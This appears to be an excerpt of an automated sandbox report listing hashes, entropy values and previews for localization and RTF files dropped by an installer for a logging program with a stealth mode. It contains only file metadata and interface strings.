                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):12536
                                                                                                                                                                                                                                                          Entropy (8bit):4.8846461435532245
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:UCTESqmmj063sRDYVLf0Xj/KgqYFP6ez7zUc4:UMmj93sRD80zDt4
                                                                                                                                                                                                                                                          MD5:772446C6263F1055F474A1AE2EFF7A11
                                                                                                                                                                                                                                                          SHA1:E3C521C7105C860D8139030D2363647821E593D7
                                                                                                                                                                                                                                                          SHA-256:E346F5CE552A3E5216E2826D86C64135372B51EA74BF4DE468C442A43B1F3E63
                                                                                                                                                                                                                                                          SHA-512:FCD7A0EB648B02F9FED9F50078A197EE4C6BC1451AF6CFDD5A0376B42EA2F448B2D9C09560ACFDAA959707762F2E36470C470D33C10290274BC04BF58B15B2BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Start"..tbStartHint="Abilita logging"..tbStop="Stop"..tbStopHint="Disabilita logging"..tbFind="Trova"..tbFindHint="Cerca informazioni di log"..tbSetting="Impostazioni"..tbSettingHint="Impostazioni programma"..tbAbout="Circa"..tbAboutHint="Circa / informazioni di registrazione"..tbHomePage="Home Page"..tbHomePageHint="Vai alla Home Page del programma"..tbToday="Oggi"..tbTodayHint="Vai al log di oggi"..tbHide="Nascondi"..tbHideHint="Modalit. Stealth (nessuna icona nella barra delle applicazioni)"..tbMinimize="Minimizza"..tbMinimizeHint="Minimizza nel Tray"..tbExit="Esci"..tbExitHint="Esci e ferma il log"..gbLog="Log Eventi"..tCurrLogSize="Dimensioni correnti Log (Mb)"..tCurrScrSize="Dimensioni correnti Screenshot (Mb)"..tMaxL
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27393
                                                                                                                                                                                                                                                          Entropy (8bit):5.064150437041318
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:lBliK0GRTzXqMKGCYv/DOo8eKjHHhSvMonfGQ3R:8KLTz/4WCo8eaHhW7n+QB
                                                                                                                                                                                                                                                          MD5:9087FB9892DDAA830650011299AF2670
                                                                                                                                                                                                                                                          SHA1:FF023B1F38F5B7D093C4F2AAB3470B1575BFA806
                                                                                                                                                                                                                                                          SHA-256:969FC0043D05C76A4FBD148A0087DB9768B62D1DA17212D11A50F0A4A77CCBFC
                                                                                                                                                                                                                                                          SHA-512:D0A9F5FFA8752A01F04B2B61024575E270D53FF5D30180EB4C3FC70C2A5A3D7A794DBE7B596CEC08E0554514D4113C2EC218B3C6533F0B3B952148C46DB8781A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..##############################################################################..# ........! .. ....... ........ ..... ..... .. ..... "="!..##############################################################################..tbStart="....."..tbStartHint="...... ...... ......."..tbStop="...."..tbStopHint="......... ...... ......."..tbFind="....."..tbFindHint="..... .......... . ...."..tbSetting="........."..tbSettingHint="......... ........."..tbAbout=". ......"..tbAboutHint=". ......... / ............... .........."..tbHomePage=".. ...."..tbHomePageHint="....... ........ ........ ........."..tbToday="......."..tbTodayHint="....... . ............ ...."..tbHide="......"..tbHideHint="......... ..... (... ..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17281
                                                                                                                                                                                                                                                          Entropy (8bit):5.761139641515786
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:fA4WN9lOQy166uXz7tw7ROcW70cfgjqiK3xuaMV4Q:fAfy1LuntiROcWLNuaMVt
                                                                                                                                                                                                                                                          MD5:BAF8BBC333EA4877FF98E6EC0437E18F
                                                                                                                                                                                                                                                          SHA1:43FE338508BA6B1E59B5B0D21A641DEB4F887F82
                                                                                                                                                                                                                                                          SHA-256:32CAC64ABA0B7BEC0C48D76CE6D6C3695E241173CAD408C4F2F220CB5AE6A87B
                                                                                                                                                                                                                                                          SHA-512:5E2ED8A0DF57200E7FD2FF5F1F21041A3800AE92C66B550B91116D0E50685C3602467C738601D071049B1D3E74ED92DB2DAE5CE6D33F9776F8C2F62AA2E36C1E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart=".."..tbStartHint=".. .."..tbStop=".."..tbStopHint=".. ...."..tbFind=".."..tbFindHint=".. .. .."..tbSetting=".."..tbSettingHint=".... .."..tbAbout=".."..tbAboutHint=".. / .. .."..tbHomePage="...."..tbHomePageHint=".... ..... .."..tbToday=".."..tbTodayHint=".. ... .."..tbHide=".."..tbHideHint="... .. (... .... ... .. ..)"..tbMinimize="..."..tbMinimizeHint=".... ..."..tbExit=".."..tbExitHint=".... .. .."..gbLog="... .."..tCurrLogSize=".. .. (Mb)"..tCurrScrSize=".... .. (Mb)"..tCurrSnpSize=".. .
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19337
                                                                                                                                                                                                                                                          Entropy (8bit):5.025077721740106
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:USTHedgI9UbHmTZCmfwoxKza62zxpZ6EV00azBKh:U0I2bH2kRKKzwxpZnj4Kh
                                                                                                                                                                                                                                                          MD5:7EB33A9C085F56E0004E166D1702EEA1
                                                                                                                                                                                                                                                          SHA1:C8C514993F866C3282F2E53C231E5961EE8E3B90
                                                                                                                                                                                                                                                          SHA-256:F96F92DFCD7C119EBD998989312F009D9ABA9E5C3A5B7899A8DD146370F5AFC4
                                                                                                                                                                                                                                                          SHA-512:BA7B7716AD33D71247CEE9CC8B630BBA9B948654D366A892D5F1471B4A5FAD908A774600E8577223FFC043D4BD620BFC4222D2CC833B2AD1DF13CF7ADA5A203E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Start"..tbStartHint="Erfassung aktivieren"..tbStop="Stop"..tbStopHint="Erfassung deaktivieren"..tbFind="Finden"..tbFindHint="Nach Protokoll Informationen suchen"..tbSetting="Einstellungen"..tbSettingHint="Programm Einstellungen"..tbAbout=".ber"..tbAboutHint=".ber/ Informationsinfo"..tbHomePage="Home Page"..tbHomePageHint="Gehen Sie zum Programm Home Page"..tbToday="Heute"..tbTodayHint="Gehen Sie zum heutigen Protokoll"..tbHide="Verstecken"..tbHideHint="Stelth Modus (Kein Icon im Systempfad)"..tbMinimize="Minimieren"..tbMinimizeHint="Auf Ablage minimieren"..tbExit="Ausgang"..tbExitHint="Ausgang und Protokollstopp"..gbLog="Vorgangsprotokoll"..tCurrLogSize="Protokollgr..e (Mb)"..tCurrScrSize="Screenshots Gr..e (Mb)"..tCur
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20359
                                                                                                                                                                                                                                                          Entropy (8bit):4.977393911384311
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:Ui/yM5JVBb8Mc2MfcwNx0TiTtGNleNglf8sj1AzDqqSo:UFGYD+icNleNhcIGqd
                                                                                                                                                                                                                                                          MD5:3115ABE2CF8075BB08D1B7EA95180E7E
                                                                                                                                                                                                                                                          SHA1:752F7833223EDB298E903C9731E78A3109E026D3
                                                                                                                                                                                                                                                          SHA-256:156C2CDE62ABF6D9289B85054F707FA8777A722EC2DDBC0615544A216E633133
                                                                                                                                                                                                                                                          SHA-512:C5DE077A294349896E2D846808806AF67B9E29E7EC1358B763A8F66381F839983A4ADE4C751A8A36C84EE20E8ADD1E5F869759000F527284F4312D9803617BC3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Commencez"..tbStartHint="Activez le journal de bord"..tbStop="Arr.tez "..tbStopHint="D.sactivez le journal de bord"..tbFind="Trouvez"..tbFindHint="Recherchez des informations dans le journal de bord"..tbSetting="Param.tres"..tbSettingHint="Les param.tres du programme"..tbAbout=". propos"..tbAboutHint=". propos / informations de journal de bord"..tbHomePage="Page d'accueil"..tbHomePageHint="Allez . la page d'accueil du programme"..tbToday="Aujourd'hui"..tbTodayHint="Allez dans journal de bord d.aujourd'hui"..tbHide="Masquez"..tbHideHint="Le mode furtif (pas d'ic.ne dans la zone de notification)"..tbMinimize="Minimisez"..tbMinimizeHint="Minimisez au magasin"..tbExit="Quittez"..tbExitHint=" Quittez et arr.tez le jour
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):21327
                                                                                                                                                                                                                                                          Entropy (8bit):4.95775402864365
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:UyK3wUGkRqqS7M2IgCEAIAiIYNwCPjuPTyySHaNM7lcomkn3J:UhgqSUdEpNw+jMTHS6eJ
                                                                                                                                                                                                                                                          MD5:C61869FD95FCAA4887007EE40C1AEF78
                                                                                                                                                                                                                                                          SHA1:5B2E9E425C48F37A3C6F2AFCFD35569BE240FB0C
                                                                                                                                                                                                                                                          SHA-256:4EBE5322D84F71C59E806B8BD29D3C53D3FDA1C82238084FBAA8852DE668E14E
                                                                                                                                                                                                                                                          SHA-512:815D5C77AF6F439D5FD3C254B6F1957537A30507D4BB40CB5ADB6FDC817D2389BD5B8D69F7AE67AF87C1F42B7A5799E0F82A0A3A0C543CFF46E72B74D867F9A8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="..."..tbStartHint="..... ......."..tbStop="...."..tbStopHint="..... ......."..tbFind="....."..tbFindHint="..... .. ....... ......."..tbSetting="........."..tbSettingHint="....... ........"..tbAbout="..."..tbAboutHint=".../...... ......."..tbHomePage="...... ........"..tbHomePageHint="...... ... ...... ........"..tbToday="....."...tbTodayHint="...... ... ... ....."..tbHide="....."..tbHideHint="..... ..... (.. .... ... .. .... ......)"..tbMinimize="....."..tbMinimizeHint="..... ... ......"..tbExit="...."..tbExitH
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20198
                                                                                                                                                                                                                                                          Entropy (8bit):5.546409615191028
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:UZbTxZJZoqbCXEgYNOZFnXzLlWQIrNacguCX:UBsFXz5W1NaOCX
                                                                                                                                                                                                                                                          MD5:CBEC3F081899B6B55B280D8F3DD4B3D2
                                                                                                                                                                                                                                                          SHA1:F340F12DD49A6F6D2E20999788430A6951E7950B
                                                                                                                                                                                                                                                          SHA-256:95C2CF8B3687D4EE57D51E982684660264A443D0AE516F6144728AC0C77FFCE4
                                                                                                                                                                                                                                                          SHA-512:F4C7027A5BEDBC2F6E44DA52F59B35FAC8A3657DB9796F9B8BE4B660D25083544597ED525EEADD2B9373325E3E6FD83BD9736BAA8E50187F5F8CCFF989D6A140
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="...."..tbStartHint=".........."..tbStop="...."..tbStopHint=".........."..tbFind="...."..tbFindHint="........."..tbSetting=".."..tbSettingHint="........"..tbAbout="...."..tbAboutHint=".... /...."..tbHomePage="......"..tbHomePageHint="................"..tbToday=".."..tbTodayHint="........"..tbHide=".."..tbHideHint="....... (..................)"..tbMinimize="....."..tbMinimizeHint="........."..tbExit=".."..tbExitHint=".........."..gbLog=
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):15013
                                                                                                                                                                                                                                                          Entropy (8bit):6.013025249187838
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:9DL/YIoCnMY+innEvlPTgFQXU516bXHsFAp/JfloqJPeNKi:9DL/YIoCnMMnEpEXyb3cAtJfav
                                                                                                                                                                                                                                                          MD5:98FE3D6DA49E6A81B5C6A5D5ABF2E69A
                                                                                                                                                                                                                                                          SHA1:A90458B40E3559466180B29822E0E83CC3000632
                                                                                                                                                                                                                                                          SHA-256:FB966B8124C5CEDCEC536B5DFE54168F7AA07DC9717D4099EA67A8DF72342F50
                                                                                                                                                                                                                                                          SHA-512:EA826D7205C882B74D20A4A0499A2966F47BD88CE01326D55B105BAA267606FE0F5C20F995762CC5E320F1273E4C06B0E6840815F2E2601A59CF7F3B12B25372
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### ....... "=".......! ############..###############################################################################..tbStart=".."..tbStartHint="...."..tbStop=".."..tbStopHint="...."..tbFind=".."..tbFindHint="......"..tbSetting=".."..tbSettingHint="...."..tbAbout=".."..tbAboutHint=".. / ...."..tbHomePage=".."..tbHomePageHint="......"..tbToday=".."..tbTodayHint="......"..tbHide=".."..tbHideHint="................"..tbMinimize="..."..tbMinimizeHint="......"..tbExit=".."..tbExitHint="......."..gbLog="...."..tCurrLogSize="....(Mb)"..tCurrScrSize="......(Mb)"..tCurrSnpSize=".........(Mb)"..tCurrSoundsSize="...... (Mb)"..tCurrVideosSize=".
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):12536
                                                                                                                                                                                                                                                          Entropy (8bit):4.8846461435532245
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:UCTESqmmj063sRDYVLf0Xj/KgqYFP6ez7zUc4:UMmj93sRD80zDt4
                                                                                                                                                                                                                                                          MD5:772446C6263F1055F474A1AE2EFF7A11
                                                                                                                                                                                                                                                          SHA1:E3C521C7105C860D8139030D2363647821E593D7
                                                                                                                                                                                                                                                          SHA-256:E346F5CE552A3E5216E2826D86C64135372B51EA74BF4DE468C442A43B1F3E63
                                                                                                                                                                                                                                                          SHA-512:FCD7A0EB648B02F9FED9F50078A197EE4C6BC1451AF6CFDD5A0376B42EA2F448B2D9C09560ACFDAA959707762F2E36470C470D33C10290274BC04BF58B15B2BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Start"..tbStartHint="Abilita logging"..tbStop="Stop"..tbStopHint="Disabilita logging"..tbFind="Trova"..tbFindHint="Cerca informazioni di log"..tbSetting="Impostazioni"..tbSettingHint="Impostazioni programma"..tbAbout="Circa"..tbAboutHint="Circa / informazioni di registrazione"..tbHomePage="Home Page"..tbHomePageHint="Vai alla Home Page del programma"..tbToday="Oggi"..tbTodayHint="Vai al log di oggi"..tbHide="Nascondi"..tbHideHint="Modalit. Stealth (nessuna icona nella barra delle applicazioni)"..tbMinimize="Minimizza"..tbMinimizeHint="Minimizza nel Tray"..tbExit="Esci"..tbExitHint="Esci e ferma il log"..gbLog="Log Eventi"..tCurrLogSize="Dimensioni correnti Log (Mb)"..tCurrScrSize="Dimensioni correnti Screenshot (Mb)"..tMaxL
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):10431
                                                                                                                                                                                                                                                          Entropy (8bit):4.953862205312216
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:su79jU9jV9jW9ju9j89jM9j39jO9jR6z6C6D6E6f6E6O6Y6Y222K2a2O2G2y2E2S:X9jU9jV9jW9ju9j89jM9j39jO9jR6z6o
                                                                                                                                                                                                                                                          MD5:F253166C14180CDA4CF3682EBDA81E10
                                                                                                                                                                                                                                                          SHA1:42CB7285AE2A1D8FFFBDB8E92DD762F116E6E5E7
                                                                                                                                                                                                                                                          SHA-256:21604302E29A98F4F73EB4DD22C1B3FD52840C05B9438769E8568E69A2AD6890
                                                                                                                                                                                                                                                          SHA-512:26EF9FFCDBE8D66B92954FA2DC046B7049B772B789BD4192D62CCDEA211D613413B241E1527396FCCF6087B041A526641C9D12F5C29810637C42AFF812A15061
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq2\fcharset128 Arial;}{\f11\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af7\dbch\af8\afs28\loch\f4\fs28 Intestazione;}.{\s16\sbasedon0\snext16\sb0\sa120 Corpo testo;}.{\s17\sbasedon16\snext17\sb0\sa120\dbch\af9 Elenco;}.{\s18\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7403
                                                                                                                                                                                                                                                          Entropy (8bit):4.92938927718366
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:su76z6C6D6E6f6E6O6Y6K222K2a2O2G2y2E2+2tuADuEXu6mp49T20l49D7D7DP:X6z6C6D6E6f6E6O6Y6K222K2a2O2G2yx
                                                                                                                                                                                                                                                          MD5:3D3D6A046CC73D49EA8D98E66103EBC5
                                                                                                                                                                                                                                                          SHA1:3F3F6AD63BEE3F893EE2F57AF6D261AFD0A8C639
                                                                                                                                                                                                                                                          SHA-256:344EBAAFF1EC7B1BF2A627DD9A5F1B0D3C5D968F23ADA7D6A7175767B29AF483
                                                                                                                                                                                                                                                          SHA-512:405236F4E6F223EFD593A22047B79156ED9695DDE0EB4BB4261891375C3FE586251AD3E9EE9EDF914AC02AB7C51887F16A5897915B0BEE8CC708CF6B116D9342
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq2\fcharset128 Arial;}{\f11\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af7\dbch\af8\afs28\loch\f4\fs28 Intestazione;}.{\s16\sbasedon0\snext16\sb0\sa120 Corpo testo;}.{\s17\sbasedon16\snext17\sb0\sa120\dbch\af9 Elenco;}.{\s18\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6776
                                                                                                                                                                                                                                                          Entropy (8bit):4.952214417097897
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:su76z6C6D6E6f6E6O6Y6K222K2a2O2G2y2E2+2PuADGE7lqWiNBXa98XP00PDDP:X6z6C6D6E6f6E6O6Y6K222K2a2O2G2yp
                                                                                                                                                                                                                                                          MD5:1BD6D948821BAAD56E7BD929CE99BC3E
                                                                                                                                                                                                                                                          SHA1:87753F34928DF1FDCE8D2AE17A734E2D032B7392
                                                                                                                                                                                                                                                          SHA-256:179807CC391D4A379560F1E9119C44DBD0F8BABD7C9581758DDFD2C24D15CCA5
                                                                                                                                                                                                                                                          SHA-512:CD8934815BBF3C6AA344CEDCA40732E4428DECC0F122F124B3AECD1720BA89A7D5A9BA0EE8AE4675C57C56B3ABFC44BB2AF2A868111ED7D23D156BCEAF0D6ADF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\ansi\deff3\adeflang1025.{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fswiss\fprq2\fcharset0 Arial;}{\f3\froman\fprq2\fcharset128 Liberation Serif{\*\falt Times New Roman};}{\f4\fswiss\fprq2\fcharset128 Liberation Sans{\*\falt Arial};}{\f5\froman\fprq2\fcharset128 Arial;}{\f6\froman\fprq0\fcharset128 Arial;}{\f7\fnil\fprq2\fcharset128 WenQuanYi Micro Hei;}{\f8\fnil\fprq2\fcharset128 Lohit Hindi;}{\f9\fnil\fprq0\fcharset128 Lohit Hindi;}{\f10\fnil\fprq2\fcharset128 Arial;}{\f11\fnil\fprq0\fcharset128 Arial;}}.{\colortbl;\red0\green0\blue0;\red128\green128\blue128;}.{\stylesheet{\s0\snext0\nowidctlpar{\*\hyphen2\hyphlead2\hyphtrail2\hyphmax0}\cf0\kerning1\hich\af7\langfe2052\dbch\af8\afs24\alang1081\loch\f3\fs24\lang1040 Predefinito;}.{\s15\sbasedon0\snext16\sb240\sa120\keepn\hich\af7\dbch\af8\afs28\loch\f4\fs28 Intestazione;}.{\s16\sbasedon0\snext16\sb0\sa120 Corpo testo;}.{\s17\sbasedon16\snext17\sb0\sa120\dbch\af9 Elenco;}.{\s18\
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37355
                                                                                                                                                                                                                                                          Entropy (8bit):5.0224273603988925
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2rF4DO6zLpzBMRQ1W7MiynhCGm7aVZ/6A9a:2raD7IA9a
                                                                                                                                                                                                                                                          MD5:72215D6BB69B80AD421E5FBEC9CEE983
                                                                                                                                                                                                                                                          SHA1:4DC407E1BF25A18F3C9B2F2E94440D3A0AC505D8
                                                                                                                                                                                                                                                          SHA-256:0B1A02997F8DC944153BBEA47C302C3A155B1363A2A4F6A23218EB1BA9D1ACD8
                                                                                                                                                                                                                                                          SHA-512:D1F1409D1E0946F84F3D3D3FBBB90BB23195A84402E0DA16A102C62E1198F28AB80046E805A3B4CAAD0B61039E07B57350133F1E0DCB3142A0B2487F1F1174B4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \froman\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Serif{\*\falt Times New Roman};}..{\f40\fbidi \fswiss\fcharset128\fprq2{\*\panose 00000000000000000000}Liberation Sans{\*\falt Arial};}{\f41\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}WenQuanYi Micro Hei{\*\falt MS Mincho};}..{\f42\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}Lohit Hindi{\*\falt MS Mincho};}{\f315\fbidi \fnil\fcharset128\fprq2{\*\panose 00000000000000000000}@WenQuanYi Micro Hei;}..{\f316\fbidi \froman\fcharset128\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):76355
                                                                                                                                                                                                                                                          Entropy (8bit):4.982630349215747
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:KewXZEMuTyIT+TWkN+3vMHRYRv0lTiHRYRv0lTiHRYRv0lHiHRYRv0leUE/lLr/6:KeMEZgIA9C
                                                                                                                                                                                                                                                          MD5:0DD30E30324435D32C3336875F79F308
                                                                                                                                                                                                                                                          SHA1:6F38100EBA73AAD482B1B290FF5C21DD0C3AA692
                                                                                                                                                                                                                                                          SHA-256:D9939A99B67D9267B439373CC44EE14A10432AF1BB3AEB6EBBDDE1839EDCBD99
                                                                                                                                                                                                                                                          SHA-512:62513A5EDAF36F0D69A9519F74795659493A1B0C9B9E662D0AF4C15A7F68043F6C3A2F9231D9C949572D787524448C8F31B4A6AE9D242FB28758BA084C3B9545
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
